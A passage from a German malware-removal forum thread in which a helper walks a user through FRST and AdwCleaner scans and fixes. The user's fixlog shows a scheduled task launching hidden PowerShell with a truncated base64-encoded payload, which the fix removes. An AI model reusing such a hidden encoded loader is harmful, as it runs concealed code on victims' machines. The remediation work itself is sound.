    Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!

  • Wichtig:
    • Bitte gedulde dich, sobald du die Reparatur gestartet hast. Je nach Art und Umfang der notwendigen Reparaturen kann dies einige Minuten dauern.
      Eventuell erhältst du während der Reparatur auch die Information "keine Rückmeldung" von FRST. Das ist normal, du musst nichts weiter tun, nur warten.
    • Mit diesem Fix werden alle temporären Dateien, Browserdaten sowie der Papierkorb gelöscht.

  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
  • Gegebenenfalls muss dein Rechner neu gestartet werden.
  • Wichtig: Eventuell erhältst du während der Reparatur die Information keine Rückmeldung von FRST.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.

Alt 20.07.2022, 21:49   #9
g0s
 
Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber - Standard

Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber



Ich hab alles durchlaufen lassen, wie du es mir geschrieben hast.


fixlog sieht wie folgt aus:

Code:
ATTFilter
Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 18-07-2022
durchgeführt von chris (20-07-2022 22:21:18) Run:1
Gestartet von C:\Users\chris\Downloads\FRST
Geladene Profile: chris & Lisa
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
Start::
SystemRestore: On
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [Energy] => C:\Users\chris\AppData\Roaming\Energy\Energy.exe [134333464 2022-05-23] (Energy ltd) [Datei ist nicht signiert] <==== ACHTUNG
C:\Users\chris\AppData\Roaming\Energy
Task: {06CC8DD5-2DE4-4D09-805E-0F5B5270D6F8} - System32\Tasks\chrome history => cmd /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AH (Der Dateneintrag hat 4871 mehr Zeichen). <==== ACHTUNG
C:\Users\chris\AppData\Local\chrome_history

HKLM\...\Run: [] => [X]
HKLM-x32\...\Run: [] => [X]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [Synapse3] => [X]
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [] => [X]
HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\RunOnce: [Delete Cached Update Binary] => C:\Windows\system32\cmd.exe /q /c del /q "C:\Users\Lisa\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe" (Keine Datei)
HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\RunOnce: [Uninstall 21.180.0905.0007] => C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Lisa\AppData\Local\Microsoft\OneDrive\21.180.0905.0007" (Keine Datei)
HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3: <==== ACHTUNG (Beschränkung - Zones)
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <==== ACHTUNG
FF Plugin HKU\S-1-5-21-292222086-413629167-3624375346-1001: jpl.nasa.gov/NASAEyes -> D:\Uni\NASA's Eyes\npNASAEyes.dll [Keine Datei]
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\StartupApproved\Run: => "Energy"

startpowershell:
Set-Service -Name "BITS" -StartupType Manual -Verbose
Set-Service -Name "Dhcp" -StartupType Automatic -Verbose
Set-Service -Name "EventLog" -StartupType Automatic -Verbose
Set-Service -Name "EventSystem" -StartupType Automatic -Verbose
Set-Service -Name "nsi" -StartupType Automatic -Verbose
Set-Service -Name "RasMan" -StartupType Manual -Verbose
Set-Service -Name "SDRSVC" -StartupType Manual -Verbose
Set-Service -Name "SstpSvc" -StartupType Manual -Verbose
Set-Service -Name "TrustedInstaller" -StartupType Manual -Verbose
Set-Service -Name "VSS" -StartupType Manual -Verbose
Set-Service -Name "Winmgmt" -StartupType Automatic -Verbose
Set-Service -Name "wuauserv" -StartupType Manual -Verbose

Set-MpPreference -DisableAutoExclusions $true -Force
set-mppreference -mapsreporting basic -Force
set-mppreference -DisableRealtimeMonitoring $false -Force
set-mppreference -DisablePrivacyMode $true -Force
set-mppreference -DisableIOAVProtection $false -Force
set-mppreference -CheckForSignaturesBeforeRunningScan $true -Force
set-mppreference -PUAProtection enabled -Force
Set-MpPreference -DisableBehaviorMonitoring $false -Force
Set-MpPreference -SignatureScheduleDay Everyday -force
set-mppreference -RealTimeProtectionEnabled $true -force
set-mppreference -OnAccessProtectionEnabled $true -force

Function Remove-all-windefend-excludes {
$Paths=(Get-MpPreference).ExclusionPath
$Extensions=(Get-MpPreference).ExclusionExtension
$Processes=(Get-MpPreference).ExclusionProcess
foreach ($Path in $Paths) { Remove-MpPreference -ExclusionPath $Path -force}
foreach ($Extension in $Extensions) { Remove-MpPreference -ExclusionExtension $Extension -force}
foreach ($Process in $Processes) { Remove-MpPreference -ExclusionProcess $Process -force}
}
Set-MpPreference -DisableAutoExclusions $true -Force
Remove-all-windefend-excludes
endpowershell:

CMD: ipconfig /flushdns
CMD: netsh winsock reset catalog
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh winhttp reset proxy
CMD: Bitsadmin /Reset /Allusers
CMD: Winmgmt /salvagerepository
CMD: Winmgmt /resetrepository
CMD: winmgmt /resyncperf
CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R
CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R
CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R
CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R

Hosts:
RemoveProxy:
C:\WINDOWS\SysWOW64\*.tmp
C:\WINDOWS\System32\*.tmp
C:\Windows\SystemTemp\*.tmp
EmptyTemp:
End::
*****************

SystemRestore: On => abgeschlossen
Wiederherstellungspunkt wurde erfolgreich erstellt.
Prozesse erfolgreich geschlossen.
"HKU\S-1-5-21-292222086-413629167-3624375346-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Energy" => erfolgreich entfernt
C:\Users\chris\AppData\Roaming\Energy => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{06CC8DD5-2DE4-4D09-805E-0F5B5270D6F8}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{06CC8DD5-2DE4-4D09-805E-0F5B5270D6F8}" => erfolgreich entfernt
C:\Windows\System32\Tasks\chrome history => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\chrome history" => erfolgreich entfernt
C:\Users\chris\AppData\Local\chrome_history => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\" => erfolgreich entfernt
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\" => erfolgreich entfernt
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => konnte nicht entfernt werden, Schlüssel könnte geschützt sein
"HKU\S-1-5-21-292222086-413629167-3624375346-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Synapse3" => erfolgreich entfernt
"HKU\S-1-5-21-292222086-413629167-3624375346-1001\Software\Microsoft\Windows\CurrentVersion\Run\\" => erfolgreich entfernt
"HKU\S-1-5-21-292222086-413629167-3624375346-1006\Software\Microsoft\Windows\CurrentVersion\RunOnce\\Delete Cached Update Binary" => erfolgreich entfernt
"HKU\S-1-5-21-292222086-413629167-3624375346-1006\Software\Microsoft\Windows\CurrentVersion\RunOnce\\Uninstall 21.180.0905.0007" => erfolgreich entfernt
HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 => erfolgreich entfernt
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => erfolgreich entfernt
HKU\S-1-5-21-292222086-413629167-3624375346-1001\Software\MozillaPlugins\jpl.nasa.gov/NASAEyes => erfolgreich entfernt
"D:\Uni\NASA's Eyes\npNASAEyes.dll" => nicht gefunden
"HKU\S-1-5-21-292222086-413629167-3624375346-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\Energy" => erfolgreich entfernt
"HKU\S-1-5-21-292222086-413629167-3624375346-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\Energy" => nicht gefunden

========= Powershell: =========

Set-MpPreference : Es wurde kein Parameter gefunden, der dem Parameternamen "RealTimeProtectionEnabled" entspricht.
In C:\FRST\tmp000.ps1:22 Zeichen:18
+ set-mppreference -RealTimeProtectionEnabled $true -force
+                  ~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [Set-MpPreference], ParameterBindingException
    + FullyQualifiedErrorId : NamedParameterNotFound,Set-MpPreference
 
Set-MpPreference : Es wurde kein Parameter gefunden, der dem Parameternamen "OnAccessProtectionEnabled" entspricht.
In C:\FRST\tmp000.ps1:23 Zeichen:18
+ set-mppreference -OnAccessProtectionEnabled $true -force
+                  ~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [Set-MpPreference], ParameterBindingException
    + FullyQualifiedErrorId : NamedParameterNotFound,Set-MpPreference
 

========= Ende von Powershell: =========


========= ipconfig /flushdns =========


Windows-IP-Konfiguration

Der DNS-Aufl”sungscache wurde geleert.

========= Ende von CMD: =========


========= netsh winsock reset catalog =========


Der Winsock-Katalog wurde zurckgesetzt.
Sie mssen den Computer neu starten, um den Vorgang abzuschlieáen.


========= Ende von CMD: =========


========= netsh advfirewall reset =========

OK.


========= Ende von CMD: =========


========= netsh advfirewall set allprofiles state ON =========

OK.


========= Ende von CMD: =========


========= netsh winhttp reset proxy =========


Aktuelle WinHTTP-Proxyeinstellungen:

    DirectAccess (kein Proxyserver).


========= Ende von CMD: =========


========= Bitsadmin /Reset /Allusers =========


BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.

0 out of 0 jobs canceled.

========= Ende von CMD: =========


========= Winmgmt /salvagerepository =========

Das WMI-Repository ist konsistent.

========= Ende von CMD: =========


========= Winmgmt /resetrepository =========

Das WMI-Repository wurde zurckgesetzt.

========= Ende von CMD: =========


========= winmgmt /resyncperf =========

0
========= Ende von CMD: =========


========= "%WINDIR%\SYSTEM32\lodctr.exe" /R =========


Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.
========= Ende von CMD: =========


========= "%WINDIR%\SysWOW64\lodctr.exe" /R =========


Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.
========= Ende von CMD: =========


========= "%WINDIR%\SYSTEM32\lodctr.exe" /R =========


Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.
========= Ende von CMD: =========


========= "%WINDIR%\SysWOW64\lodctr.exe" /R =========


Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.
========= Ende von CMD: =========

C:\Windows\System32\Drivers\etc\hosts => erfolgreich verschoben
Hosts erfolgreich wiederhergestellt.

========= RemoveProxy: =========

"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
"HKU\S-1-5-21-292222086-413629167-3624375346-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\S-1-5-21-292222086-413629167-3624375346-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
"HKU\S-1-5-21-292222086-413629167-3624375346-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\S-1-5-21-292222086-413629167-3624375346-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt


========= Ende von RemoveProxy: =========


=========== "C:\WINDOWS\SysWOW64\*.tmp" ==========

nicht gefunden

========= Ende -> "C:\WINDOWS\SysWOW64\*.tmp" ========


=========== "C:\WINDOWS\System32\*.tmp" ==========

nicht gefunden

========= Ende -> "C:\WINDOWS\System32\*.tmp" ========


=========== "C:\Windows\SystemTemp\*.tmp" ==========

nicht gefunden

========= Ende -> "C:\Windows\SystemTemp\*.tmp" ========


=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 12891303 B
Java, Discord, Steam htmlcache => 985249063 B
Windows/system/drivers => 819737175 B
Edge => 0 B
Chrome => 408098929 B
Firefox => 0 B
Opera => 15937346 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 411388 B
NetworkService => 25460267 B
chris => 48950143 B
Lisa => 100182477 B
OVRLibraryService => 100182477 B

RecycleBin => 12910247072 B
EmptyTemp: => 14.4 GB temporäre Dateien entfernt.

================================

Ergebnis der geplanten Datei-Verschiebungen (Start-Modus: Normal) (Datum&Uhrzeit: 20-07-2022 22:47:04)


Ergebnis der geplanten Schlüssel-Entfernung nach dem Neustart:

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => konnte nicht entfernt werden, Schlüssel könnte geschützt sein

==== Ende vom Fixlog 22:47:04 ====
         

Danke für die schnelle antwort

Geändert von cosinus (21.07.2022 um 07:49 Uhr) Grund: code tags

Alt 21.07.2022, 07:48   #10
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber - Cool

Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber



Zitat:
Zitat von g0s Beitrag anzeigen
Obgleich ich hier offenbar auf Hilfsbereitschaft treffe, würde ich mich sehr freuen, wenn mein Anliegen nicht als "Dünnschiss" betitelt wird.
Ich betitelte ja auch nicht dein Anliegen als Dünnschiss, sondern Meldungen wie "da wurde irgendwas irgendwo gefunden"


adwCleaner

Führe AdwCleaner gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei in CODE-Tags.

adwcleaner bitte wiederholen falls es Funde gab.



Posten in CODE-Tags

Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR oder 7Z-Archiv zu packen erschwert mir massiv die Arbeit.
Auch wenn die Logs für einen Beitrag zu groß sein sollten, bitte ich dich die Logs direkt und notfalls über mehrere Beiträge verteilt zu posten.
Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
  • Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
  • Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
  • Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
  • Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 21.07.2022, 10:55   #11
g0s
 
Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber - Standard

Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber



Der scan hat folgendes geliefert

Code:
ATTFilter
# -------------------------------
# Malwarebytes AdwCleaner 8.3.2.0
# -------------------------------
# Build:    03-23-2022
# Database: 2022-06-24.1 (Cloud)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start:    07-21-2022
# Duration: 00:00:05
# OS:       Windows 10 Home
# Scanned:  32059
# Detected: 0


***** [ Services ] *****

No malicious services found.

***** [ Folders ] *****

No malicious folders found.

***** [ Files ] *****

No malicious files found.

***** [ DLL ] *****

No malicious DLLs found.

***** [ WMI ] *****

No malicious WMI found.

***** [ Shortcuts ] *****

No malicious shortcuts found.

***** [ Tasks ] *****

No malicious tasks found.

***** [ Registry ] *****

No malicious registry entries found.

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries found.

***** [ Chromium URLs ] *****

No malicious Chromium URLs found.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries found.

***** [ Firefox URLs ] *****

No malicious Firefox URLs found.

***** [ Hosts File Entries ] *****

No malicious hosts file entries found.

***** [ Preinstalled Software ] *****

No Preinstalled Software found.



########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S00].txt ##########
         

Alt 21.07.2022, 11:13   #12
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber - Standard

Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber



Dann jetzt ne neue FRST.txt und Addition.txt
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 21.07.2022, 11:23   #13
g0s
 
Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber - Standard

Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber



FRST:
Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 21-07-2022
durchgeführt von chris (Administrator) auf DESKTOP-5G99FIR (21-07-2022 12:20:15)
Gestartet von C:\Users\chris\Downloads\FRST
Geladene Profile: chris
Plattform: Microsoft Windows 10 Home Version 21H1 19043.1826 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: Opera
Start-Modus: Normal

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(ASUSTeK COMPUTER INC.) [Datei ist nicht signiert] C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\SS3Svc32.exe
(C:\Program Files (x86)\Steam\steam.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <7>
(C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\SS3Svc32.exe ->) (ASUSTeK COMPUTER INC.) [Datei ist nicht signiert] C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\x64\SS3Svc64.exe
(C:\Program Files\Avira\Endpoint Protection SDK\endpointprotection.exe ->) (Avira Operations GmbH & Co. KG -> Avira Operations GmbH) C:\Program Files\Avira\Endpoint Protection SDK\SentryEye.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3>
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(C:\Program Files\Oculus\Support\oculus-runtime\OVRServiceLauncher.exe ->) (Oculus VR, LLC -> Facebook Technologies, LLC) C:\Program Files\Oculus\Support\oculus-runtime\OVRRedir.exe
(C:\Program Files\Oculus\Support\oculus-runtime\OVRServiceLauncher.exe ->) (Oculus VR, LLC -> Facebook Technologies, LLC) C:\Program Files\Oculus\Support\oculus-runtime\OVRServer_x64.exe
(C:\Users\chris\AppData\Roaming\GaomonTablet\GaomonTablet.exe ->) (GUANZHOU GAOMON ELECTRONIC TECHNOLOGY CO.,LTD . -> Guangzhou Gaomon Technology Co., Ltd.) C:\Users\chris\AppData\Roaming\GaomonTablet\TabletDriver.exe
(D:\Synapse3\Service\Razer Synapse Service.exe ->) (Razer USA Ltd. -> ) D:\Synapse3\UserProcess\Razer Synapse Service Process.exe
(explorer.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler64.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe <5>
(Opera Norway AS -> Opera Software) C:\Users\chris\AppData\Local\Programs\Opera GX\88.0.4412.85\opera_autoupdate.exe <2>
(services.exe ->) (ASUSTeK Computer Inc. -> ) C:\Windows\System32\AsusUpdateCheck.exe
(services.exe ->) (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Optimizer Host\Avira.OptimizerHost.exe
(services.exe ->) (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\VPN\Avira.VpnService.exe
(services.exe ->) (Avira Operations GmbH -> Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.exe
(services.exe ->) (Avira Operations GmbH -> Avira Operations GmbH) C:\Program Files\Avira\Endpoint Protection SDK\endpointprotection.exe
(services.exe ->) (Canon Inc. -> ) C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
(services.exe ->) (Even Balance, Inc. -> ) C:\Windows\SysWOW64\PnkBstrA.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe
(services.exe ->) (nordvpn s.a. -> TEFINCOM S.A.) C:\Program Files\NordVPN\nordvpn-service.exe
(services.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3>
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_5292bbfbf575e2d2\Display.NvContainer\NVDisplay.Container.exe <2>
(services.exe ->) (Oculus VR, LLC -> Facebook Technologies, LLC) C:\Program Files\Oculus\Support\oculus-runtime\OVRServiceLauncher.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc) C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzChromaStreamServer.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKServer.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) D:\Synapse3\Service\Razer Synapse Service.exe
(services.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(svchost.exe ->) (Avira Operations GmbH -> Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Systray.Application.exe
(svchost.exe ->) (GUANZHOU GAOMON ELECTRONIC TECHNOLOGY CO.,LTD . -> Guangzhou Gaomon Technology Co., Ltd.) C:\Users\chris\AppData\Roaming\GaomonTablet\GaomonTablet.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.20970.0_x64__8wekyb3d8bbwe\HxOutlook.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.20970.0_x64__8wekyb3d8bbwe\HxTsr.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(svchost.exe ->) (Opera Norway AS -> Opera Software) C:\Users\chris\AppData\Local\Programs\Opera\assistant\browser_assistant.exe <2>
(wbem\unsecapp.exe ->) (NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9277520 2020-12-10] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX2] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX2\CNMNSST2.exe [279240 2016-12-09] (Canon Inc. -> CANON INC.)
HKLM-x32\...\Run: [Avira System Speedup User Starter] => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.Core.Common.Starter.exe [332848 2022-05-09] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4282328 2022-06-07] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [Grammarly] => C:\Users\chris\AppData\Local\Grammarly\DesktopIntegrations\Grammarly.Desktop.exe [946136 2022-06-15] (Grammarly, Inc. -> )
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [MicrosoftEdgeAutoLaunch_0A1E394B2107F9944ED3CB9C6839BC54] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [3601824 2022-07-14] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\Run: [Discord] => C:\Users\Lisa\AppData\Local\Discord\Update.exe [1512760 2020-12-03] (Discord Inc. -> GitHub)
HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\Run: [com.squirrel.Teams.Teams] => C:\Users\Lisa\AppData\Local\Microsoft\Teams\Update.exe [2454184 2021-05-25] (Microsoft 3rd Party Application Component -> Microsoft Corporation)
HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\Run: [Opera GX Browser Assistant] => C:\Users\Lisa\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe [3291288 2021-02-01] (Opera Software AS -> Opera Software)
HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\RunOnce: [Delete Cached Standalone Update Binary] => C:\Windows\system32\cmd.exe /q /c del /q "C:\Users\Lisa\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" (Keine Datei)
HKU\S-1-5-18\...\Run: [Synapse3] => D:\Synapse3\WPFUI\Framework\Razer Synapse 3 Host\Razer Synapse 3.exe [3524680 2022-02-28] (Razer USA Ltd. -> Razer Inc.)
HKLM\...\Windows x64\Print Processors\Canon TS3100 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPDDR.DLL [482816 2017-03-13] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Canon BJ Language Monitor TS3100 series: C:\Windows\system32\CNMLMDR.DLL [1302016 2017-03-13] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\103.0.5060.134\Installer\chrmstp.exe [2022-07-20] (Google LLC -> Google LLC)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0DB9E82B-D44C-40B1-9034-BF52926268FF} - System32\Tasks\Opera GX scheduled assistant Autoupdate 1614868383 => C:\Users\chris\AppData\Local\Programs\Opera GX\launcher.exe [2453488 2022-07-13] (Opera Norway AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\chris\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
Task: {18F7131B-A6D1-444B-8F9F-8574666B92FA} - System32\Tasks\Opera GX scheduled Autoupdate 1615284024 => C:\Users\Lisa\AppData\Local\Programs\Opera GX\launcher.exe [42666192 2021-09-28] (Opera Software AS -> Opera Software)
